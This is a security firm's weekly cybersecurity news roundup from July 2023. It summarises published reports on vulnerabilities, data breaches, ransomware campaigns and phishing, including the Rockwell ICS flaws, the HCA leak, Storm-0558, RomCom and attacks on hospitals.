News

Blog

Thursday, July 13th, 2023

Cybersecurity Week in Review (14/07/2023)

APT Exploit Targeting Rockwell Automation Flaws Threatens Critical Infrastructure

An unnamed advanced persistent threat (APT) group has set its sights on two Rockwell Automation product vulnerabilities that they could use to cause disruption or destruction in critical infrastructure organisations.

According to its advisory (only accessible to registered users), Rockwell has worked with the US government to analyse what it describes as a new exploit capability leveraging vulnerabilities in ControlLogix EtherNet/IP communication modules.

Specifically, 1756 EN2 and 1756 EN3 products are impacted by CVE-2023-3595, a critical flaw that can allow an attacker to achieve remote code execution with persistence on the targeted system by using specially crafted Common Industrial Protocol (CIP) messages. A threat actor could exploit the vulnerability to modify, block or exfiltrate data passing through a device.

1756-EN4 products are impacted by CVE-2023-3596, a high-severity denial-of-service (DoS) bug that can be exploited using specially crafted CIP messages.

Rockwell Automation has released firmware patches for each impacted product and has shared potential indicators of compromise (IoCs), as well as detection rules.

“We are not aware of current exploitation leveraging this capability, and intended victimisation remains unclear,” Rockwell said. “Previous threat actors cyberactivity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that victim scope could include international customers. Threat activity is subject to change and customers using affected products could face serious risk if exposed.”

The US Cybersecurity and Infrastructure Security Agency (CISA), which has helped Rockwell investigate the exploits, has also released an advisory to warn organisations about the vulnerabilities.

Depending on the targeted ControlLogix device’s configuration the vulnerability could allow attackers to cause denial or loss of control, denial or loss of view, theft of operational data, or manipulation of control for disruptive or destructive consequences on the industrial process for which the ControlLogix system is responsible.

The exploit capability appears to be the work of an unnamed APT, but no evidence of exploitation in the wild has been found to date, and it’s unclear what organisations or sectors may be targeted.

However, the type of access provided by CVE-2023-3595 can be compared to the zero-day flaw leveraged by a Russia-linked state-sponsored group in attacks involving the Trisis/Triton malware.

News of the exploits emerged just weeks after it was reported that several US government departments had been investigating Rockwell’s operations at a facility in China, where employees might have access to information that could be used to compromise the systems of the company’s customers.

There has been some concern that employees could find vulnerabilities in Rockwell products and exploit them in zero-day attacks aimed at systems in the US.

Source – https://www.securityweek.com/apt-exploit-targeting-rockwell-automation-flaws-could-threaten-critical-infrastructure/

HCA Data Breach: Hacker Stole Information of 11M Patients

HCA, a Nashville-based healthcare network of 180 hospitals and more than 2300 ambulatory sites in both the UK and the US, confirmed sensitive patient information was leaked during a recent cyber attack – and is now up for sale on the dark web.

HCA Healthcare, which encounters an estimated 37 million patients annually across both nations, announced the leak on its website July 10th.

“HCA recently discovered that a list of certain information with respect to some of its patients was made available by an unknown and unauthorised party on an online forum,” the organisation stated.

HCA stressed the stolen data dd not include not include any clinical or financial information.

“This appears to be a theft from an external storage location exclusively used to automate the formatting of email messages,” the notice said.

The published patient data contains “information used for email messages, such as reminders that patients may wish to schedule an appointment and education on healthcare programs and services,” HCA stated.

“The investigation is ongoing and we cannot confirm the number of individuals whose information was impacted. HCA Healthcare believes that the list contains approximately 27 million rows of data that may include information for approximately 11 million HCA Healthcare patients.”

Patient information that was exposed includes:

  • Patient name, city, state, and zip code;
  • Patient email, telephone number, date of birth, gender;
  • Patient service date, location and next appointment date.


HCA said the leak did not include more sensitive information, such as:

  • Clinical information, such as treatment, diagnosis, or condition;
  • Payment information, such as credit card or account numbers;
  • Sensitive information, such as passwords, driver’s license or social security numbers.


Online hacker forums and criminal darknet markets, such as the resurrected BreachForums and the new Genesis replacement 2Easy, are teaming with fellow users advertising to buy, sell and trade stolen data, as well as other hacker tools.

The security incident has not caused any “disruption to the care and services” provided to patients and communities, or to its day to day business operations, HCA said in the notice.

The company said IT teams have “not identified evidence of malicious activity” on the HCA Healthcare networks or systems, and IT teams “disabled user access to the storage location as an immediate containment measure.”

“Based on the information known at this time, the company does not believe the incident will materially impact its business, operations, or financial results,” HCA said.

Source – https://cybernews.com/news/hca-us-uk-healthcare-network-patient-data-leak/

Microsoft: Chinese Hackers Breached US Govt Exchange Email Accounts

A Chinese hacking group has breached the email accounts of more than two dozen organisations worldwide, including U.S. and Western European government agencies, according to Microsoft.

The attacks have been pinned on a threat group tracked as Storm-0558, believed to be a cyber-espionage outfit focused on collecting sensitive information by breaching email systems. Microsoft started investigating these attacks on June 16, 2023, following customer reports regarding unusual mail activity.

The company discovered that starting from May 15, 2023, Storm-0558 threat actors managed to access Outlook accounts belonging to roughly 25 organisations and some consumer accounts likely connected to these organisations. However, Microsoft did not share what organisations, government agencies, or countries were affected in these email breaches.

To do that, the attackers used authentication tokens forged with the help of a stolen Microsoft account (MSA) consumer signing key.

“The actor used an acquired MSA key to forge tokens to access OWA and Outlook.com. MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail,” Microsoft said in a blog post published late Tuesday evening.

Microsoft added that it found no evidence indicating any additional unauthorised access after it “completed mitigation of this attack.”

The incident was reported to Microsoft by U.S. government officials last month after the discovery of unauthorised access to Microsoft cloud-based email services.

On Tuesday, Microsoft also revealed that the RomCom Russian-based cybercriminal group exploited an unpatched Office zero-day in recent spear-phishing attacks targeting organisations attending the NATO Summit in Vilnius, Lithuania.

Source – https://www.bleepingcomputer.com/news/security/microsoft-chinese-hackers-breached-us-govt-exchange-email-accounts/

Beware of Big Head Ransomware: Spreading Through Fake Windows Updates

A developing piece of ransomware called Big Head is being distributed as part of a malvertising campaign that takes the form of bogus Microsoft Windows updates and Word installers.

Big Head was first documented last month, when multiple variants of the ransomware were discovered designed to encrypt files on victims’ machines in exchange for a cryptocurrency payment. A majority of the Big Head samples have been submitted so far from the U.S., Spain, France, and Turkey.

In a new analysis of the .NET-based ransomware, displayed its ability to deploy three encrypted binaries: 1.exe to propagate the malware, archive.exe to facilitate communications over Telegram, and Xarch.exe to encrypt the files and display a fake Windows update.

The malware displays a fake Windows Update UI to deceive the victim into thinking that the malicious activity is a legitimate software update process, with the percentage of progress in increments of 100 seconds.

Big Head is no different from other ransomware families in that it deletes backups, terminates several processes, and performs checks to determine if it’s running within a virtualised environment before proceeding to encrypt the files.

In addition, the malware disables the Task Manager to prevent users from terminating or investigating its process and aborts itself if the machine’s language matches that of Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar, and Uzbek. It also incorporates a self-delete function to erase its presence.

Also discovered is a third variant of Big Head that incorporates a file infector called Neshta, which is used to insert malicious code into executables on the infected host.

The identity of the threat actor behind Big Head is currently not known but a YouTube channel with the name “aplikasi premium cuma cuma,” was identified, suggesting an adversary likely of Indonesian origin.

Source – https://thehackernews.com/2023/07/beware-of-big-head-ransomware-spreading.html

Microsoft Warns of Office Zero-Day Attacks, No Patch Available

Russian spies and cybercriminals are actively exploiting still-unpatched security flaws in Microsoft Windows and Office products, according to an urgent warning from the world’s largest software maker.

In an unusual move, Microsoft documented “a series of remote code execution vulnerabilities” impacting Windows and Office users and confirmed it was investigating multiple reports of targeted code execution attacks using Microsoft Office documents.

Redmond’s security response pros tagged the unpatched Office flaws with the CVE-2023-36884 identifier and hinted that an out-of-band patch may be released before next month’s Patch Tuesday.

From the CVE-2023-36884 bulletin:

“Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.

An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.”

In a separate blog, Microsoft’s threat intelligence team said it flagged a phishing campaign with Office zero-day exploits targeting defense and government entities in Europe and North America. “The campaign involved the abuse of CVE-2023-36884, which included a remote code execution vulnerability exploited via Microsoft Word documents, using lures related to the Ukrainian World Congress,” the company warned.

The Microsoft Office zero-day headlines a monster Patch Tuesday that sees the release of patches for more than 130 documented security defects in the Microsoft Windows ecosystem with nine of the flaws rated ‘critical’, Microsoft’s highest severity rating.

Source – https://www.securityweek.com/microsoft-warns-of-office-zero-day-attacks-no-patch-available/

Phishing Fears as Fake Threads Websites Multiply

Threads already has more than 100 million downloads, since Meta launched the app as a rival to Twitter earlier this month. But crooks are also seeking to cash in by mimicking the new social media app, with over 700 phony domain names emerging in a single day.

The startling revelation found hundreds of bogus URLs that redirected to suspected malicious sites registered in a single day on July 9th.

Threads ‘themed’ websites such as “Threadsapk[.]download”, a suspected phishing site, or “Threadsappz[.]com”, which purports to offer an Android version of the app, should be avoided.

Users should exercise caution, as this download is not sourced from the official App Store or Google Play. Instead, it redirects to an external source — in this case, a Google Drive, where the APK [Android format] file can be downloaded. Such downloads from untrusted sources can pose significant security risks, including the potential for malware infection.

Other suspicious domain names to watch out for include whatisthreads[.]com, socialthreads[.]store, threadsapp[.]shop, threadsl[.]com, and threadsinstagram[.]app — which appears to be trying to leverage fellow Meta platform Instagram as well.

Early adopters of Threads should exercise due caution at all times and only download it from trusted sources.

Consumers should also avoid clicking on links shared through unverified sources such as messages from unknown email addresses or unfamiliar websites, as these may send them to malicious websites or cajole them into downloading malware.

Once caught in this way, the victim is prone to identity theft and future phishing or social engineering scams, ultimately aimed at fraudulently parting with their money.

Source – https://cybernews.com/news/threads-fake-domain-names-phishing/

New TOITOIN Banking Trojan Targeting Latin American Businesses

Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023.

The sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilising specially crafted modules throughout each stage. These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks.

The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections.

The email messages leverage an invoice-themed lure to trick unwitting recipients into opening them, thereby activating the infection. Within the ZIP archive is a downloader executable that’s engineered to set up persistence by means of an LNK file in the Windows Startup folder and communicate with a remote server to retrieve six next-stage payloads in the form of MP3 files.

The downloader is also responsible for generating a Batch script that restarts the system after a 10-second timeout. This is done so as to “evade sandbox detection since the malicious actions occur only after the reboot,” the researchers said.

Included among the fetched payloads is “icepdfeditor.exe,” a valid signed binary by ZOHO Corporation Private Limited, which, when executed, sideloads a rogue DLL (“ffmpeg.dll”) codenamed the Krita Loader.

The loader, for its part, is designed to decode a JPG file downloaded alongside the other payloads and launch another executable known as the InjectorDLL module that reverses a second JPG file to form what’s called the ElevateInjectorDLL module.

The InjectorDLL component subsequently moves to inject ElevateInjectorDLL into the “explorer.exe” process, following which a User Account Control (UAC) bypass is carried out, if required, to elevate the process privileges and the TOITOIN Trojan is decrypted and injected into the “svchost.exe” process.

TOITOIN comes with capabilities to gather system information as well as harvest data from installed web browsers such as Google Chrome, Microsoft Edge and Internet Explorer, Mozilla Firefox, and Opera. Furthermore, it checks for the presence of Topaz Online Fraud Detection (OFD), an anti-fraud module integrated into banking platforms in the LATAM region.

The nature of the responses from the command-and-control (C2) server is presently not known due to the fact that the server is no longer available.

Source – https://thehackernews.com/2023/07/new-toitoin-banking-trojan-targeting.html

Critical Infrastructure Services Firm Ventia Takes Systems Offline Due to Cyberattack

Critical infrastructure services provider Ventia over the weekend announced that it has taken some of its systems offline to contain a cyberattack. Ventia provides long-term management, maintenance, and operations services for critical infrastructure organisations and for private entities across the defense, electricity and gas, environmental services, and water industries.

The company says it operates more than 400 sites in Australia and New Zealand, with a combined employee base of over 35,000.

In an incident notice on Saturday, the company announced that it decided to take some key systems offline in response to the incident, and that it had engaged with external experts and law enforcement to investigate it.

“As we work to restore our networks, we will prioritise the security and safety of our people, our customers, and our stakeholders,” the company said.

Ventia did not share details on the impact the incident has had but said in an updated statement on Sunday that its operations are continuing while it monitors its network for any abnormal activity.

According to Ventia, all operations are expected to return to normal within the following days.

Although the company did not share specifics on the incident, it is possible that file-encrypting ransomware was involved in the attack, as typical incident response measures in the event of ransomware involve taking systems offline to prevent it from spreading.

The company has yet to reveal whether any type of information was stolen during the attack.

Source – https://www.securityweek.com/critical-infrastructure-services-firm-ventia-takes-systems-offline-due-to-cyberattack/

Revolut Faces $20 Million Loss as Attackers Exploit Payment System Weakness

Malicious actors exploited an unknown flaw in Revolut’s payment systems to steal more than $20 million of the company’s funds in early 2022.

The development was reported by the Financial Times, citing multiple unnamed sources with knowledge of the incident. The breach has not been disclosed publicly.

The fault stemmed from discrepancies between Revolut’s U.S. and European systems, causing funds to be erroneously refunded using its own money when some transactions were declined.

The problem was first detected in late 2021. But before it could be closed, the report said organised criminal groups leveraged the loophole by “encouraging individuals to try to make expensive purchases that would go on to be declined.” The refunded amounts would then be withdrawn from ATMs.

The exact technical details associated with the flaw are currently unclear.

About $23 million was stolen in total, with some funds recovered by pursuing those who had withdrawn cash. The mass fraud scheme is said to have resulted in a net loss of about $20 million for the neobank and fintech firm.

The disclosure arrives less than a week after Interpol announced the arrest of a suspected senior member of a French-speaking hacking crew known as OPERA1ER, which has been linked to attacks aimed at financial institutions and mobile banking services with malware, phishing campaigns, and large-scale Business Email Compromise (BEC) scams.

Source – https://thehackernews.com/2023/07/hackers-steal-20-million-by-exploiting.html

RomCom Hackers Target NATO Summit Attendees in Phishing Attacks

A threat actor referred to as ‘RomCom’ has been targeting organisations supporting Ukraine and guests of the NATO Summit that took place on the 11th in Vilnius, Lithuania.

Intelligence teams recently discovered two malicious documents that impersonated the Ukranian World Congress organisation and topics related to the NATO Summit to lure selected targets. The attackers used a replica of the Ukrainian World Congress website hosted on an “.info” domain instead of the real one that uses an “.org” top-level domain.

The downloaded documents come with malicious code that exploits the RTF file format to initiate connections to external resources, eventually loading malware onto the victim’s system.

RomCom malware was first discovered by Unit 42 in August 2022, who linked it to a Cuba Ransomware affiliate, an assessment that the Computer Emergency Response Team of Ukraine (CERT-UA) appeared to agree with based on an October 2022 report.

However, analysis from that time said that the threat actors behind RomCom follow a rather globalised targeting approach, highlighting that Cuba ransomware has never inclined towards hacktivism.

In November 2022, a new RomCom campaign was discovered that abused software brands and used fake sites in English and Ukrainian to target unsuspecting victims with malicious installers.

More recently, in May 2023, a report on RomCom’s latest campaign showed that the threat actors were now impersonating legitimate software like Gimp and ChatGPT or creating fake software developer sites to push their backdoor to victims through Google Ads and black SEO techniques.

The latest campaign used download links on a typo-squatted domain for the Ukrainian World Congress site, likely promoted via spear-phishing, to infect visitors with malware. The documents downloaded from the fake website initiate an outbound connection upon launch and download additional components from the attacker’s command and control (C2) server.

The additional component observed during the research is a script utilising the Follina (CVE-2022-30190) vulnerability from Microsoft’s Support Diagnostic Tool (MSDT).

The final step of the attack is to load the RomCom backdoor on the machine, which arrives in the form of an x64 DLL file named ‘Calc.exe.’ RomCom connects to the C2 to register the victim and sends back details such as username, network adapter info, and RAM size of the compromised computer.

The backdoor eventually writes ‘security.dll’ to run automatically at reboot for persistence and awaits commands from the C2, which, based on previous reporting, includes data exfiltration, downloading of additional payloads, deleting files or directories, spawning processes with spoofed PID, as well as starting a reverse shell.

The anlaysed campaign is thought to be either a rebranded RomCom operation or one that includes core members from the old group that support new threat activity.

Source – https://www.bleepingcomputer.com/news/security/romcom-hackers-target-nato-summit-attendees-in-phishing-attacks/

UK Battles Hacking Wave as Ransomware Gang Claims ‘Biggest Ever’ NHS Breach

The U.K.’s largest NHS trust has confirmed it’s investigating a ransomware incident as the country’s public sector continues to battle a rising wave of cyberattacks.

Barts Health NHS Trust, which runs five London-based hospitals and serves more than 2.5 million patients, was recently added to the dark web leak site of the ALPHV ransomware gang. The gang, also known as BlackCat, says it has stolen 70 terabytes of sensitive data in what it claims is the biggest breach of healthcare data in the United Kingdom.

Samples of the allegedly stolen data include employee identification documents, including passports and driver licenses, and internal emails labeled “confidential.”

This incident is the second breach of NHS data in recent weeks. As first reported by the Independent, a June ransomware attack on the U.K.’s University of Manchester saw hackers access an NHS dataset that holds information on 1.1 million patients across 200 hospitals. The compromised data — gathered by the university for research purposes — includes NHS numbers and the first three letters of patients’ postcodes, according to reports.

The National Cyber Security Centre, the U.K.’s cybersecurity agency, is investigating the incident.

Ofcom, the U.K.’s communications regulator, recently confirmed it was among the organisations to have been compromised by the Clop ransomware gang’s mass-exploitation of a security flaw in Progress Software’s MOVEit Transfer managed file transfer service, and the University of the West of Scotland (UWS) has confirmed that it’s experiencing an “ongoing cyber incident,” but kept light on details.

One of the largest ongoing cyber incidents impacting the U.K. public sector resulted from a May ransomware attack on Capita, a British outsourcing giant that provides critical services for the U.K. government.

As a result of the attack, which was claimed by the Black Basta ransomware group, more than 90 organisations reported breaches of personal information. This included the Universities Superannuation Scheme (USS), the U.K.’s largest private pension provider, which said that the personal details of almost half a million members were held on servers accessed during the breach.

Source – https://techcrunch.com/2023/07/10/uk-hacks-public-sector-nhs-ransomware/?


After a Lull, Ransomware Attacks on Hospitals are Rising Again

Earlier this year, cybersecurity experts noted a slight dip in ransomware attacks aimed at health systems, but they also cautioned that the decline may be short-lived.

In recent weeks, more ransomware groups have launched attacks at health systems, and they have disrupted patient care, says John Riggi, national advisor for cybersecurity and risk for the American Hospital Association.

“I have seen, unfortunately, an increase in ransomware high impact ransomware attacks just in the past six weeks, and with multiple facilities being hit,” Riggi stated.

In fact, it’s becoming clear that attacks aimed at hospitals and healthcare organisations are looking to be worse in 2023 than last year.

As of late June, more than 220 cyberattacks have targeted hospitals and health systems, and more than 36 million people have been affected. By comparison, 44 million were affected by hacking incidents in all of 2022.

It’s worth noting that Riggi is focusing solely on cyberattacks aimed by bad actors. The federal government also tracks other unauthorised health data disclosures, such as accidental breaches of information from digital tracking tools on hospital websites.

In the first six months of the year, the data breaches involving two firms – MCNA, a dental insurer, and PharMerica, a pharmacy services firm – affected more than 14 million people. One health system recently was hit with a ransomware attack that disrupted cancer treatment.

A ransomware attack disrupted services at Richmond University Medical Center in New York in May.

A Russia-linked ransomware group, Clop, has claimed responsibility for attacks involving the healthcare industry. Riggi says Clop is “notoriously responsible for large data ransomware attacks recently.”

Some hospitals, including Community Health Systems, have been affected by Clop’s attack on Fortra, a cybersecurity firm that provides secure file transfer software. NationsBenefits Holdings, which provides supplemental benefits, was also affected by the Fortra breach.

Federal officials have also issued warnings about TimisoaraHackerTeam, or THT, a relatively unknown group that has targeted the healthcare industry. The U.S. Department of Health and Human Services issued a June 16 advisory warning, “When its ransomware is deployed, their rarely used and very effective technique of encrypting data in a targeted environment has paralyzed the health and public health (HPH) sector.”

The health department says the group attacked an unnamed U.S. cancer center in June 2023, and the attack “significantly reduced patient treatment capability, rendered digital services unavailable, and also threatened exposure of patient personal health information.”

Many cybercriminals are using Lockbit ransomware in their attacks. Operating as a “Ransomware-as-a-service” model, Lockbit allows other gangs and attackers to use their technology to infiltrate hospitals and other organizations. Federal officials issued an advisory in June urging health systems and other critical sectors to take steps to defend their systems against Lockbit ransomware attacks.

Riggi pointed to the growing sophistication of some ransomware gangs, including Clop, which exploited previously unknown vulnerabilities in file transfer systems.

In the past, hackers and cyberattackers have been leery of attacking hospitals, cybersecurity experts have said. But Riggi says some ransomware groups are showing no hesitation of going after health systems, even if they endanger patients.

“These are threat-to-life crimes,” Riggi says. “These are not data crimes. These are not white-collar crimes. And the adversaries have to understand, when we are diverting ambulances with stroke, heart attack and trauma patients, people’s lives are at risk.”

Scripps Health suffered a costly cyberattack in 2021 that disrupted patient services. The attack also affected other hospitals as well, according to a study published by JAMA Network Open.

Stroke patients had to be transferred to other facilities, neighboring hospitals saw higher traffic in their emergency departments, and there was a sharp increase in the number of patients who left the emergency department without being seen.

When hospitals pay a ransom demand in a cyberattack, Riggi says most leaders are doing so to protect the safety of patients. “If a decision is made to pay, it is based on patient safety issues,” Riggi says.

Federal authorities and the American Hospital Association strongly advise hospitals and health systems against paying the ransom.

Authorities say paying ransom demands only encourages criminals to engage in other attacks, and Riggi notes that the payments could be directed to support weapons programs in North Korea or Iran. Cybersecurity experts also say criminals aren’t known for keeping their word and may simply demand more money to return stolen data or restore systems.

More health systems are refusing to pay ransom demands, Riggi says.

“The starting point, the anchor point as they develop policies and procedures and preparedness is: We will not pay. I hear that more and more,” he says.

However, hospitals and health systems need to do everything possible to fortify their defenses to deter attacks. Hospitals also need to develop strong response plans if, and more likely when, they are attacked.

Hospital leaders need to establish cybersecurity as a high priority and a risk issue threatening patient safety, Riggi says. He suggests assigning a governance structure around the risk issue to finance mitigation and recovery efforts.

Riggi says the key is “imbuing this culture of cybersecurity within a healthcare organization, helping the staff first understand that cyber hygiene is as important as medical hygiene to protect the patients.”

Hospitals also need to work with other health systems in their area to develop regional response plans to a cyberattack. If one hospital is disrupted, other neighboring facilities are going to feel the strain and need to be prepared.

“It’s what I call ransomware blast radius,” Riggi says. “The original victim is hit, but there is a collateral effect throughout the entire healthcare region.”

Cyberattacks also carry heavy financial costs. The average healthcare data breach now carries a cost of more than $10 million, according to IBM Security. And those are costs hospitals don’t need when they are facing serious financial difficulties.

Source – https://www.chiefhealthcareexecutive.com/view/after-a-lull-ransomware-attacks-on-hospitals-are-rising-again?

Smarttech247

Contact Us

The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.

    Copyright Smarttech247 - 2021